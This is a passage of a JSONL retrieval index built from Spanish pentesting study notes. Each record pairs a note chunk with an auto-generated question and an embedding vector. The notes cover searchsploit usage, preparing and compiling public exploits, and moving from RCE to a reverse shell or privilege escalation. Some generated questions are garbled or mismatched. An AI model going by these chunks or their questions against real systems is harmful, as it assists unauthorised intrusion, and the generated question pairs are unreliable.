0.00348, 0.00261]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Examinar y copiar\n```bash\nsearchsploit -x 50383 # ver el exploit (path por EDB-ID)\nsearchsploit -m 50383 # MIRROR: lo copia a tu carpeta actual\nsearchsploit -p 50383 # solo imprime la ruta\nsearchsploit -u # actualizar la base\n```", "indexar": "con que puedo ver el detalle de un exploit por su ID?", "v": [-0.14722, 0.15198, -0.22828, 0.06297, 0.04676, -0.04526, -0.03545, 0.00259, -0.00508, -0.05544, 0.01229, -0.16026, -0.05774, -0.03144, -0.16663, -0.07881, -0.01224, -0.06785, 0.03986, -0.04181, 0.06901, 0.02554, -0.00652, -0.07433, -0.06391, 0.14032, -0.02962, 0.116, -0.10629, -0.15296, -0.1397, -0.08796, -0.03618, -0.07731, -0.06273, -0.11256, 0.10697, 0.09176, 0.0528, 0.02972, 0.02614, -0.06444, -0.06672, 0.0791, 0.19548, 0.03552, -0.07783, 0.01626, -0.04764, 0.05659, 0.01971, -0.0744, -0.16838, -0.02598, 0.0039, -0.02986, 0.00906, -0.00536, -0.03925, 0.13445, 0.01369, 0.03053, -0.10172, 0.02475, -0.02184, -0.06646, -0.05326, 0.07013, 0.03551, 0.11529, 0.03157, 0.00433, -0.0753, 0.00538, -0.05609, 0.01969, 0.01814, 0.02279, -0.09488, 0.05993, -0.05478, 0.03881, -0.04278, 0.00246, -0.04362, -0.02808, -0.00649, 0.0195, 0.09073, -0.1886, -0.04182, 0.01997, -0.03016, -0.03808, -0.02542, -0.08899, 0.10459, 0.01162, -0.13592, -0.04026, 0.01181, -0.01158, -0.07034, 0.08607, 0.05037, -0.03556, 0.03441, 0.01073, -0.03746, -0.0321, -0.03286, -0.03224, -0.12052, -0.00489, -0.0799, -0.00846, -0.09764, -0.02916, 0.00966, -0.04655, -0.03936, -0.10197, 0.06097, -0.00081, 0.07158, -0.02471, -0.10775, 0.11306, 0.04436, -0.06997, -0.09688, 0.07373, 0.03364, -0.02515, 0.05558, -0.0696, 0.0172, -0.07937, 0.01335, 0.04487, -0.02018, 0.01323, 0.04683, 0.07367, 0.00161, -0.02545, -0.05288, -0.01613, -0.07195, -0.06132, -0.00645, -0.05585, 0.05018, 0.0594, -0.05008, 0.02808, 0.07912, 0.05475, 0.06648, 0.00747, -0.04887, 0.08124, -0.07966, 0.01154, -0.00586, -0.0173, -0.0865, -0.05656, -0.01684, 0.0054, -0.03369, -0.00721, 0.0309, -0.01096, 0.08448, -0.06057, -0.03546, 0.00042, 0.01844, -0.03069, 0.00892, -0.03106, 0.01888, 0.02054, 0.02347, -0.01206, 0.05499, -0.04246, 0.01273, 0.00312, 0.02433, 0.03524, 0.08308, 0.10456, 0.00347, 0.03774, -0.00939, 0.02105, -0.00256, -0.05018, 0.01121, -0.00777, 0.04037, -0.00867, 0.02782, -0.03666, 0.00114, 0.04697, -0.05342, 0.05651, 0.00932, 0.00402, 0.04855, -0.09402, -0.07882, 0.09576, 0.01254, 0.03026, -0.0075, -0.0134, -0.00936, 0.09885, 0.06453, -0.00154, 0.00577, -0.01568, -0.06937, -0.03182, -0.02412, 0.06393, -0.01878, 0.06827, -0.03725, -0.0147, 0.01139, -0.01218, -0.01211, -0.0313, -0.05661, -0.00637, -0.00252, 0.07062, 0.02867, -0.01618, -0.00059, -0.00161, -0.10335, -0.01073, -0.03247, -0.04875, 0.00386, -0.04859, -0.02199, -0.1078, 0.03899, 0.03636]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Examinar y copiar\n```bash\nsearchsploit -x 50383 # ver el exploit (path por EDB-ID)\nsearchsploit -m 50383 # MIRROR: lo copia a tu carpeta actual\nsearchsploit -p 50383 # solo imprime la ruta\nsearchsploit -u # actualizar la base\n```", "indexar": "como actualizo y copio exploits guardados en mi carpeta?", "v": [0.1863, -0.05156, -0.19385, 0.09914, 0.01276, -0.14912, 0.12751, 0.17376, -0.0301, -0.09194, 0.01254, -0.07341, -0.1081, 0.18672, -0.02308, -0.05136, 0.11794, 0.06392, -0.03367, -0.00977, -0.03403, 0.13171, 0.13295, -0.05879, -0.1221, 0.06604, 0.03753, 0.01124, -0.16168, 0.02474, -0.04389, 0.16106, -0.03492, -0.05948, -0.01528, -0.06719, 0.03079, -0.05036, -0.06731, 0.01243, 0.10222, -0.02727, -0.09389, 0.014, 0.08974, -0.01567, -0.02483, 0.0028, -0.1207, 0.07077, -0.01779, -0.06267, -0.09617, -0.10393, -0.02535, -0.1191, 0.08131, 0.01062, 0.06267, 0.09493, -0.01335, -0.04422, 0.04539, 0.06533, -0.02234, -0.09807, 0.04612, -0.04512, -0.04515, 0.11508, -0.11389, 0.08031, 0.10763, 0.05735, -0.05914, -0.04869, 0.01256, -0.11016, -0.0594, 0.09459, -0.10358, 0.0079, -0.07204, 0.04607, -0.07773, -0.10642, 0.01697, 0.00434, -0.06485, -0.02798, 0.00371, 0.00971, -0.15918, 0.0375, -0.01161, -0.03736, -0.01289, 0.04742, 0.03831, 0.02466, -0.00054, 0.03395, -0.10575, 0.06654, -0.00177, 0.05672, -0.04598, 0.01309, -0.0032, 0.00468, 0.0605, 0.09579, -0.026, 0.07804, -0.01318, -0.01904, -0.02142, -0.05336, 0.05033, -0.09319, -0.14529, -0.02119, -0.03498, 0.08078, 0.07881, -0.04501, -0.0302, 0.03261, -0.01409, 0.01953, -0.11802, 0.06881, -0.06169, -0.01827, 0.01451, -0.0673, -0.09904, -0.05126, 0.00521, -0.0109, 0.03529, 0.0266, 0.0092, -0.03052, 0.00527, 0.07852, 0.04356, 0.01466, 0.00114, -0.06416, 0.03269, -0.01767, -0.04952, 0.02425, 0.02448, 0.02187, 0.06505, -0.07298, -0.02732, 0.00441, 0.00415, -0.11141, 0.0594, 0.01491, -0.02786, -0.03035, 0.0028, 0.01671, 0.03472, 0.01542, -0.05031, 0.02786, -0.02232, -0.02491, -0.00063, -0.03864, 0.00881, -0.02155, 0.02252, 0.01222, -0.01412, -0.00928, 0.01121, 0.0623, -0.02655, -0.05974, 0.08668, 0.05877, -0.0139, -0.05047, 0.11463, 0.01338, 0.05739, 0.07593, -0.07756, -0.03084, -0.02341, 0.0327, 0.02023, -0.0309, -0.08885, -0.02794, -0.01867, -0.03564, 0.00977, 0.02859, -0.04417, 0.0053, -0.09916, 0.06393, -0.00574, 0.03308, -0.01592, -0.06125, -0.02205, -0.01621, 0.04053, 0.03727, -0.05889, -0.10477, 0.02603, 0.07539, 0.00334, -0.02611, -0.04807, 0.01586, -0.05511, 0.03823, 0.01403, 0.00647, -0.04059, -0.00927, 0.03633, 0.00355, 0.00116, 0.01332, 0.00012, -0.04084, -0.03691, -0.04202, -0.02964, 0.05426, -0.00752, -0.03445, 0.0162, -0.01653, -0.06193, 0.04408, -0.01683, -0.04244, 0.02503, -0.05716, -0.00939, -0.0646, 0.02657, -0.02825]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Antes de lanzar un exploit (Β‘importante!)\n1. **LΓ©elo entero.** Hay PoCs **maliciosos/falsos** que te hackean a ti.\n2. Edita lo obvio: IP/puerto del atacante, offsets, URL objetivo, shellcode.\n3. Si es C: `gcc exploit.c -o exploit` (a veces flags raras, vienen en el comentario).\n4. Si es Python2 antiguo, ojo con `print`/sockets.", "indexar": "quΓ© programas sirven para editar exploits antes de ejecutarlos?", "v": [0.11365, 0.02302, -0.09158, -0.05985, 0.13042, -0.04944, 0.03973, -0.00248, -0.05411, -0.05842, -0.11464, 0.01808, 0.02437, -0.00396, -0.00186, -0.10712, 0.11699, -0.04101, 0.08849, -0.00161, -0.06873, 0.07905, 0.0232, -0.0346, -0.11107, 0.10093, -0.00244, 0.02213, -0.10814, 0.00178, -0.11946, 0.12264, 0.04989, -0.17577, 0.04763, 0.07543, 0.00371, 0.01191, 0.00399, 0.17633, 0.03157, 0.01227, -0.11197, -0.01886, 0.10286, -0.01415, 0.03982, 0.04245, 0.01548, -0.08741, 0.10291, -0.01355, -0.12182, -0.04366, 0.039, -0.10838, -0.04131, -0.14044, -0.12811, 0.07216, -0.04456, -0.02605, 0.08869, 0.02345, 0.11702, -0.07623, -0.01523, -0.03664, -0.04884, 0.19437, -0.099, 0.0784, 0.0495, 0.07839, -0.02287, -0.14155, -0.04193, -0.02984, 0.02365, 0.07309, -0.05569, -0.0233, -0.09669, 0.03955, -0.04798, -0.05367, -0.02714, 0.02652, -0.04218, -0.09433, 0.02802, 0.00482, -0.04644, 0.08895, 0.08353, 0.02696, 0.13662, 0.05566, 0.03417, 0.1978, 0.04419, -0.19054, -0.05707, 0.11948, -0.08961, 0.06156, -0.0203, 0.01175, -0.04242, 0.01002, -0.00492, 0.00488, 0.01441, -0.03838, -0.03158, 0.00959, -0.06359, -0.10186, 0.03231, -0.09268, -0.14932, 0.00926, -0.07592, 0.01938, 0.06451, -0.01025, 0.00996, 0.05405, 0.00067, 0.02187, 0.01061, -0.01468, 0.04708, 0.0007, -0.01106, -0.08499, 0.08535, -0.05425, 0.00301, -0.09878, 0.08317, 0.05759, 0.01309, 0.06641, 0.0248, 0.06034, 0.00554, -0.00094, 0.03681, -0.03189, 0.1031, -0.0261, -0.09555, 0.02772, -0.07902, -0.06117, 0.01512, 0.0074, 0.01312, 0.08866, 0.01629, -0.01526, 0.00833, -0.03522, 0.03855, -0.03294, 0.01969, 0.01818, 0.02797, 0.10706, 0.02189, 0.09291, 0.03938, -0.01051, 0.07203, -0.06141, -0.06886, 0.04117, 0.04609, 0.02796, -0.04578, -0.00574, 0.06696, 0.01668, -0.02799, -0.02789, 0.0494, -0.01609, -0.03206, 0.03476, 0.02413, 0.01189, 0.07734, 0.00979, -0.00272, 0.03211, -0.03518, 0.0153, -0.00253, -0.08662, -0.00342, -0.03157, 0.0111, 0.01017, 0.09279, 0.0456, 0.00302, 0.0184, -0.06696, 0.09896, -0.01466, 0.03522, 0.03525, -0.02132, -0.07131, -0.01052, 0.02995, 0.06404, 0.04374, 0.00728, -0.01117, -0.01558, 0.05923, -0.02603, 0.00556, -0.0619, 0.00041, -0.02078, -0.00255, 0.00511, 0.01047, -0.03725, -0.02614, 0.01007, 0.01002, -0.06197, 0.01849, -0.04456, 0.02541, -0.08439, -0.02977, 0.08285, 0.00388, -0.07481, -0.00614, -0.01974, -0.05259, -0.01261, -0.04055, -0.01659, -0.00444, -0.00394, 0.02281, -0.02863, 0.05314, -0.01002]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Antes de lanzar un exploit (Β‘importante!)\n1. **LΓ©elo entero.** Hay PoCs **maliciosos/falsos** que te hackean a ti.\n2. Edita lo obvio: IP/puerto del atacante, offsets, URL objetivo, shellcode.\n3. Si es C: `gcc exploit.c -o exploit` (a veces flags raras, vienen en el comentario).\n4. Si es Python2 antiguo, ojo con `print`/sockets.", "indexar": "con quΓ© herramientas puedo compilar un exploit hecho en C?", "v": [-0.09358, 0.11368, -0.22067, -0.06597, 0.06542, -0.22281, 0.02554, 0.16675, -0.1143, -0.1385, -0.08533, -0.00778, -0.03632, 0.02562, 0.0141, -0.02003, 0.02341, -0.10934, -0.00368, -0.05517, -0.00057, -0.02217, -0.01699, -0.03357, -0.03853, 0.07348, 0.07534, 0.01668, -0.13461, 0.01045, 0.03696, 0.11045, 0.07948, -0.03577, 0.00045, -0.03467, -0.04427, 0.02041, -0.0743, 0.00158, -0.07151, -0.05024, -0.21851, 0.05311, 0.0885, -0.06303, -0.06351, -0.07384, -0.01948, 0.04524, -0.01647, -0.06885, -0.23396, -0.04821, 0.03599, -0.08666, 0.06477, -0.08728, 0.03156, -0.05948, -0.02776, 0.04367, -0.0748, 0.10638, 0.00104, -0.02953, -0.07992, -0.07995, -0.10586, 0.15577, -0.03137, 0.07539, -0.03871, -0.04709, 0.02961, -0.03708, -0.03076, -0.03071, 0.04544, -0.01215, -0.03436, -0.04831, -0.06497, -0.07287, 0.00199, -0.01554, 0.13801, -0.06098, 0.00637, -0.12993, 0.04418, -0.00273, -0.09928, -0.03133, 0.02333, -0.05686, 0.14833, -0.01225, -0.05095, 0.00397, 0.04037, -0.012, -0.12901, 0.09217, -0.03751, 0.10651, -0.00203, -0.00532, -0.02886, -0.04978, 0.0407, 0.07821, -0.04692, 0.01504, -0.0379, 0.01343, -0.0431, -0.07834, -0.0377, -0.00234, 0.02047, 0.00751, -0.0799, -0.01088, 0.04728, -0.01631, -0.08468, 0.10146, 0.02249, -0.07604, -0.06443, -0.03542, 0.00398, -0.02061, 0.02067, -0.12009, 0.04289, -0.12585, 0.03688, -0.06496, 0.04413, 0.10948, -0.05221, -0.06569, 0.05292, 0.03793, -0.04576, 0.00495, -0.06979, -0.09983, 0.06547, -0.01029, 0.02609, 0.1084, -0.07996, 0.00645, 0.08843, 0.02997, 0.0476, 0.03996, 0.0222, -0.04826, -0.03278, -0.04612, -0.03192, 0.0009, 0.01072, -0.00381, 0.00361, 0.04095, 0.01027, 0.10028, 0.06782, -0.02344, 0.03775, -0.07051, -0.01409, 0.0022, 0.01031, -0.05135, -0.02332, 0.00629, -0.0177, 0.05212, 0.00699, -0.01651, 0.05769, -0.03783, 0.03678, 0.01557, -0.00312, 0.05701, 0.03763, -0.06363, 0.00869, 0.02537, -0.02995, 0.02333, 0.04114, -0.02549, -0.04775, -0.018, 0.01904, -0.05455, 0.06045, 0.05021, -0.06931, -0.01501, -0.04931, 0.04417, 0.04077, 0.0123, 0.0189, -0.08526, -0.03803, 0.00488, 0.02935, 0.02768, -0.06963, -0.01692, 0.02477, 0.03911, 0.07046, -0.00904, 0.00104, 0.0479, -0.0119, -0.00562, 0.04262, 0.07388, -0.01375, -0.00869, -0.05659, 0.02986, 0.02202, -0.02201, -0.00036, -0.04008, -0.06039, 0.01809, 0.02213, 0.02664, 0.0053, 0.02981, -0.04798, -0.05107, 0.03023, -0.04189, -0.05003, -0.09008, -0.03927, 0.00132, 0.03038, -0.07189, 0.0004, -0.03939]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Antes de lanzar un exploit (Β‘importante!)\n1. **LΓ©elo entero.** Hay PoCs **maliciosos/falsos** que te hackean a ti.\n2. Edita lo obvio: IP/puerto del atacante, offsets, URL objetivo, shellcode.\n3. Si es C: `gcc exploit.c -o exploit` (a veces flags raras, vienen en el comentario).\n4. Si es Python2 antiguo, ojo con `print`/sockets.", "indexar": "hay alguna herramienta que me ayude a revisar si el cΓ³digo del exploit estΓ‘ malicioso o falso?", "v": [-0.15362, 0.07898, -0.10636, -0.10398, 0.00252, -0.1316, -0.16992, 0.06467, -0.12627, -0.08305, -0.09105, -0.22845, 0.02999, 0.01625, 0.06488, -0.10141, 0.04555, -0.01435, 0.0739, -0.08959, 0.02521, -0.09297, -0.06632, -0.1099, -0.04399, 0.04709, -0.05987, -0.0551, -0.17547, -0.14263, 0.07848, 0.03325, 0.0358, -0.06515, -0.11308, 0.07807, 0.12771, -0.00239, 0.02842, 0.09352, 0.07339, -0.02033, -0.07929, 0.04314, -0.04663, -0.0471, -0.07889, 0.07046, 0.01382, 0.11131, -0.01161, -0.19278, -0.18859, 0.00709, 0.01569, -0.05969, 0.10489, -0.04771, -0.0487, -0.12062, -0.04786, -0.08674, -0.0201, -0.04826, -0.03214, 0.01767, 0.05475, 0.00406, -0.06705, 0.10497, 0.01152, 0.06843, -0.05707, 0.01574, -0.09856, -0.0984, 0.03927, -0.03779, -0.01427, 0.0169, 0.02932, -0.03636, -0.01974, 0.06873, -0.09228, -0.09691, -0.00415, -0.02871, 0.01849, -0.11741, 0.01017, 0.04872, -0.02234, -0.03707, -0.035, 0.05685, 0.1182, -0.05184, 0.01741, 0.00365, 0.09844, -0.11296, 0.02945, 0.02079, 0.0993, 0.10683, -0.01742, -0.01248, -0.03481, 0.04953, -0.00587, -0.03387, -0.0543, -0.01244, 0.01222, -0.00042, -0.05316, -0.07205, 0.04351, -0.05415, -0.03362, 0.01328, -0.10661, 0.00474, -0.00937, 0.04486, -0.01081, 0.066, 0.05463, -0.03715, -0.12845, -0.06068, -0.01578, 0.01929, -0.02817, -0.05765, 0.02322, -0.11527, 0.01988, 0.01433, 0.00319, 0.0429, -0.00913, -0.00219, -0.03916, 0.02062, -0.01922, -0.06182, -0.09351, -0.02437, -0.00655, 0.03971, 0.03538, 0.0506, -0.07453, 0.03387, 0.01699, 0.03869, -0.04663, 0.00808, -0.08653, -0.055, -0.01401, -0.06621, -0.05142, -0.07871, 0.06854, -0.00039, 0.05728, 0.02222, -0.00782, 0.02675, 0.11975, -0.02998, 0.05129, -0.01712, -0.04746, 0.01704, -0.06162, -0.09432, -0.01341, -0.01763, 0.05922, 0.00966, 0.02804, 0.00482, 0.01558, 0.05194, -0.00421, -0.01999, 0.08173, -0.00399, 0.01901, 0.01382, 0.04728, 0.05975, 0.03696, -0.02872, 0.07782, -0.04481, 0.00751, -0.01033, -0.00787, -0.03675, 0.0003, 0.0431, -0.03927, -0.04254, -0.07074, 0.06872, 0.09472, -0.04647, 0.00347, -0.07559, -0.00402, -0.02286, -0.03518, 0.09148, 0.03208, -0.00651, -0.03435, 0.01749, 0.05607, 0.02847, -0.06703, 0.0197, -0.02228, 0.03993, -0.013, 0.0225, -0.01694, 0.00106, -0.02302, -0.02065, 0.00978, -0.03557, 0.04543, -0.0033, -0.00821, -0.0489, 0.02566, 0.03818, 0.02118, -0.07123, 0.01889, 0.04037, -0.01044, -0.07037, -0.01017, -0.03802, 0.04166, -0.03937, 0.00097, -0.08879, 0.04817, -0.0588]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\nRCE β†’ Reverse shell. Si es local privesc β†’ mira primero PEASS-ng y Privesc Linux / Privesc Windows (kernel exploit = ΓΊltimo recurso).\n\nRelacionado: Exploits conocidos Β· Nmap NSE Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "que herramienta sirve para lanzar un shell remoto local?", "v": [0.06046, -0.03163, -0.23089, -0.20029, -0.01952, -0.12363, -0.09934, -0.01484, 0.05947, 0.00103, -0.12599, -0.08058, 0.10576, -0.11623, 0.12172, 0.11949, -0.05207, -0.00945, -0.06084, 0.02707, -0.02683, 0.04727, -0.0973, -0.03339, -0.0552, -0.03239, 0.12624, -0.03633, -0.18871, 0.04385, -0.03431, -0.0175, -0.01848, -0.04666, -0.05019, -0.04009, 0.02348, 0.06331, -0.06347, 0.05296, 0.06488, 0.02044, -0.13236, 0.03879, 0.06118, 0.06615, 0.02037, -0.03179, 0.06369, 0.12956, -0.07054, -0.17707, -0.12302, 0.03194, 0.02755, -0.02774, 0.23084, -0.18378, 0.03472, -0.11944, -0.19833, -0.07786, -0.01366, -0.04144, 0.029, -0.06278, -0.04997, -0.08893, -0.10895, -0.03361, -0.0443, -0.03544, 0.13001, 0.02903, -0.06971, -0.00477, -0.00526, 0.07683, 0.08971, -0.06034, 0.00853, -0.06924, -0.04066, 0.01966, -0.0976, -0.12262, 0.10647, -0.00601, 0.03866, -0.0871, -0.00451, 0.01839, -0.03552, 0.01189, -0.00242, 0.00723, 0.03656, -0.05365, -0.05993, -0.04114, 0.08722, -0.07594, -0.07562, 0.06062, 0.04872, 0.0045, -0.00863, 0.01931, -0.03677, 0.0625, 0.05824, 3e-05, -0.01894, 0.00654, -0.05627, 0.00945, -0.04072, -0.04405, 0.04908, 0.0309, 0.03487, 0.00754, -0.05142, -0.0258, -0.06712, 0.02326, -0.07425, 0.03892, 0.01024, -0.01437, 0.05331, -0.01153, -0.0099, 0.05725, -0.0182, 0.00831, 0.05086, -0.11172, 0.00456, -0.09223, 0.02828, 0.04428, -0.04328, -0.03922, 0.0194, 0.03256, 0.01629, 0.00275, -0.01148, -0.00903, 0.06481, -0.04446, -0.05071, 0.0447, -0.10014, -0.02388, -0.01603, 0.01874, -0.06044, 0.02759, -0.01236, -0.03865, 0.05958, 0.00114, -0.00892, -0.10958, -0.0305, -0.01201, 0.08023, 0.08891, -0.01225, 0.07604, 0.05711, -0.00979, -0.01172, -0.04632, 0.00174, 0.01747, 0.00092, -0.06746, -0.02089, 0.02817, -0.05209, -0.04128, 0.05418, -0.00934, 0.02948, -0.05868, 0.00323, 0.0229, -0.02169, -0.01886, 0.01354, -0.03362, 0.03817, -0.00341, -0.01129, -0.08634, 0.06187, 0.03764, -0.08309, -0.00417, 0.00235, -0.03352, 0.04234, 0.09481, -0.01631, 0.0084, -0.03397, 0.05569, 0.00736, 4e-05, 0.03448, 0.05188, 0.01907, -0.0162, 0.01248, -0.03388, -0.00232, 0.03097, 0.0166, -0.01492, 0.03027, -0.01243, 0.00658, 0.06941, 0.04767, -0.03324, 0.03344, -0.03632, 0.02868, -0.00606, 0.00349, -0.00873, 0.00062, -0.09006, 0.06554, -0.02714, -0.04964, -0.04935, -0.05599, 0.05741, -0.03589, -0.05172, -0.08719, -0.05772, -0.05591, -0.0209, -0.01156, -0.06128, -0.05851, -0.00613, 0.06749, -0.00055, 0.0046, 0.0215]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## DespuΓ©s\nRCE β†’ Reverse shell. Si es local privesc β†’ mira primero PEASS-ng y Privesc Linux / Privesc Windows (kernel exploit = ΓΊltimo recurso).\n\nRelacionado: Exploits conocidos Β· Nmap NSE Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "con que puedo explotar vulnerabilidades deprivilegios en Linux o Windows como ΓΊltimo recurso?", "v": [-0.10452, 0.02783, -0.00834, -0.18865, 0.103, -0.05857, -0.13486, -0.03459, -0.00461, -0.07979, 0.07188, -0.14934, -0.01308, -0.00389, -0.06986, -0.03731, -0.09289, -0.0617, -0.03585, -0.0878, -0.04585, -0.0675, -0.10873, -0.0298, 0.08857, 0.01659, 0.03035, -0.09576, -0.01621, -0.01676, -0.09669, 0.05086, -0.01109, -0.0247, -0.0223, 0.15799, -0.01127, 0.06841, 0.08848, 0.10523, 0.16565, 0.03344, -0.06788, 0.0589, 0.01113, -0.14529, -0.01295, -0.11364, 0.0064, -0.12139, -0.01694, -0.05787, -0.14155, -0.06951, 0.11098, 0.00673, 0.17566, -0.1049, 0.01737, 0.08981, -0.12588, 0.11138, -0.00711, -0.03173, 0.03223, -0.01199, -0.03068, 0.04135, -0.07493, 0.13131, -0.05172, 0.107, -0.01341, 0.02406, 0.00507, 0.0687, -0.09657, 0.00444, 0.06526, 0.01209, -0.03119, 0.07174, 0.0396, -0.01442, -0.13742, -0.18108, 0.04177, 0.02416, 0.04678, -0.04161, 0.1313, -0.00053, -0.05231, 0.02687, 0.04226, -0.07599, 0.09963, 0.05688, -0.00954, 0.04436, -0.07942, -0.00858, -0.05043, 0.13544, 0.08503, 0.08821, -0.01893, -0.03384, 0.01351, -0.08136, -0.03077, -0.00205, 0.00225, -0.00568, -0.03273, -0.00403, -0.10695, -0.04024, 0.01901, 0.00686, -0.0393, -0.08387, -0.02212, 0.04247, 0.01563, -0.05633, -0.04936, 0.12046, -0.01026, -0.07534, 0.01701, -0.04735, 0.01352, 0.05364, -0.05718, 0.03543, 0.05792, -0.05041, 0.00868, -0.05151, 0.07496, 0.06127, 0.07169, 0.02506, 0.10824, 0.01882, 0.09542, -0.0003, -0.04493, -0.08514, 0.03527, -0.04718, 0.00998, 5e-05, -0.10631, 0.02453, 0.02042, 0.08805, 0.01913, 0.01225, -0.01673, -0.02959, -0.03957, 0.09231, -0.03699, 0.01857, -0.0098, -0.00144, 0.03071, 0.00848, -0.03486, 0.08435, 0.03548, 0.0199, 0.04989, -0.07431, 0.03964, -0.00086, -0.03759, -0.02606, -0.05292, 0.00865, -0.02153, -0.04461, 0.00847, 0.05635, -0.05114, 0.08302, 0.02573, 0.03791, -0.03649, -0.02195, 0.04878, 0.01954, -0.00729, -0.01805, -0.04513, 0.01645, 0.01444, -0.01063, -0.08923, 0.01087, -0.06435, -0.04789, 0.10889, 0.07388, -0.02782, 0.0317, -0.00884, 0.07949, 0.0132, -0.00606, 0.07128, -0.03335, -0.03927, -0.0456, 0.05761, 0.05194, -0.01047, 0.00426, 0.01362, 0.02044, 0.07638, -0.01044, 0.04227, -0.05289, -0.06384, -0.04436, 0.01267, 0.05702, 0.04581, 0.02764, -0.04175, -0.00601, 0.0262, 0.01299, 0.02093, 0.00806, -0.02886, -0.00433, -0.03306, 0.07521, 0.00209, -0.07642, -0.04477, -0.07546, -0.0828, 0.03587, 0.02915, -0.07589, -0.00025, 0.02383, 0.04614, -0.05774, -0.04467, -0.0153]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n (Γ­ndice)\n\n> \"EnumeraciΓ³n exhaustiva\" es el paso 1 de la MetodologΓ­a OSCP y donde mΓ‘s gente pierde horas.\n> La mayorΓ­a de los fallos del examen son enumeraciΓ³n incompleta, no falta de tΓ©cnica.", "indexar": "quΓ© mΓ©todo de enumeraciΓ³n de puertos se usa en la metodologΓ­a OSCP?", "v": [0.06721, -0.07401, -0.02266, -0.14039, -0.03856, -0.09569, 0.09532, -0.05536, -0.12486, -0.10573, -0.11613, 0.11761, 0.16124, -0.00451, 0.01093, -0.06708, 0.19376, -0.0286, 0.0572, -0.07009, -0.11054, -0.12661, -0.10751, 0.0197, 0.06339, 0.15334, 0.03729, -0.07635, -0.05353, -0.01835, -0.03898, 0.0814, 0.04741, -0.02517, -0.08558, -0.03494, -0.04694, -0.08465, -0.02593, 0.13858, -0.08422, -0.01718, -0.05033, 0.01832, 0.13951, -0.08335, 0.00844, 0.04771, -0.03584, -0.002, -0.03337, -0.01135, -0.15715, -0.00925, -0.09011, -0.00755, -0.04003, 0.03246, -0.01027, -0.03316, -0.00545, 0.05015, -0.01306, -0.05209, 0.03424, -0.05265, -0.06469, -0.00919, -0.08539, 0.05605, 0.04216, -0.05, -0.05848, 0.02063, 0.01875, -0.02747, 0.04058, 0.06509, 0.18484, -0.01317, -0.01535, -0.1109, -0.03237, 0.05509, -0.12324, -0.0337, 0.08817, 0.00015, -0.00298, -0.18102, -0.02516, -0.07948, 0.01967, 0.04688, 0.01082, -0.09804, -0.00171, 0.08305, 0.03714, 0.05035, 0.07316, 0.04425, -0.07263, 0.10207, -0.03451, 0.05162, 0.04442, -0.00782, 0.06251, -0.09956, 0.0553, 0.03298, 0.02168, 0.00906, -0.16522, -0.06118, 0.05367, -0.04155, -0.11478, -0.00692, -0.05682, 0.02747, -0.09188, 0.00094, 0.03103, -0.03027, 0.01622, 0.15162, 0.06374, -0.00961, 0.03743, -0.09308, -0.05883, 0.04515, 0.01109, -0.02456, -0.02741, -0.06789, -0.0017, -0.03682, -0.02085, 0.08181, -0.04539, -0.04621, 0.05684, -0.0869, 0.03155, -0.09398, -0.10621, -0.07237, 0.02492, 0.03605, -0.02823, 0.00924, -0.03404, -0.04866, 0.09602, -0.03822, -0.09148, 0.12975, 0.03537, 0.00727, -0.02929, 0.00445, 0.01026, -0.0285, 0.01037, 0.02148, -0.03373, -0.01708, 0.00141, 0.12452, -0.06228, -0.04973, 0.02843, 0.02866, -0.04267, -0.05839, -0.01621, 0.01327, -0.0602, 0.09035, -0.0093, -0.10537, -0.01672, -0.04495, 0.00294, -0.03126, 0.0194, 0.10593, -0.00318, -0.01812, -0.03448, -0.05119, -0.09392, 0.02284, 0.0227, 0.02002, 0.02516, 0.0094, -0.0278, -0.00734, 0.06448, -0.01471, 0.01209, 0.04384, -0.05765, 0.04246, -0.02539, 0.02798, 0.00403, -0.04135, 0.04153, -0.01132, 0.03387, 0.02431, -0.09219, 0.00288, -0.03604, 0.06164, 0.02734, 0.01877, -0.06156, 0.04567, -0.04146, 0.04088, 0.00412, 0.05844, -0.01598, 0.03996, -0.01387, -0.01775, -0.02361, -0.05091, 0.04208, 0.04967, -0.02512, -0.06106, -0.01665, -0.07341, 0.0423, -0.06641, -0.01265, 0.00234, 0.02772, -0.05627, -0.05059, -0.00944, 0.07255, -0.02521, 0.01088, -0.0118, -0.0042, -0.03186, 0.00136, -0.08905]} -{"tipo": "pregunta", "herramienta": "EnumeraciΓ³n", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/EnumeraciΓ³n.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# EnumeraciΓ³n (Γ­ndice)\n\n> \"EnumeraciΓ³n exhaustiva\" es el paso 1 de la MetodologΓ­a OSCP y donde mΓ‘s gente pierde horas.\n> La mayorΓ­a de los fallos del examen son enumeraciΓ³n incompleta, no falta de tΓ©cnica.", "indexar": "cuΓ‘l es el mejor programa para hacer una enumeraciΓ³n exhaustiva de servicios?", "v": [-0.0619, 0.0356, -0.13891, -0.02915, 0.13168, -0.14852, 0.00721, -0.01626, -0.14579, -0.13259, -0.20271, -0.09577, 